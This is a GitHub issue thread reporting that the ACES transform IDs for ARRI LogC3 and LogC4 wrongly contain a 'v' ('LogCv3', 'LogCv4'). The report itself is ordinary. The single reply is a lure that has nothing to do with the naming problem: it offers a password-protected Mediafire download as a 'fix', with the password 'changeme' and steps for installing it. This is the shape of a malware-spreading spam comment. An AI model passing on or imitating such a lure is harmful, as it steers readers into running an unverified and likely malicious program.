### ISSUE TITLE
ARRI transfer function `ACEStransformID` have an incorrect `v` letter in their names.

### ISSUE THREAD

**Issue by KelSolaar** [ampas/aces-input-and-colorspaces#10]
The ARRI transfer function `ACEStransformID` have an incorrect `v` letter in their names:

- `LogCv3` vs `LogC3`
- `LogCv4` vs `LogC4`

```
urn:ampas:aces:transformId:v2.0:CSC.Arri.LogCv3_to_ACES.a2.v1
urn:ampas:aces:transformId:v2.0:CSC.Arri.LogCv4_to_ACES.a2.v1
```

![image](https://github.com/user-attachments/assets/9c35be4c-acb5-4c8a-87ad-e4aa90cc22a6)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
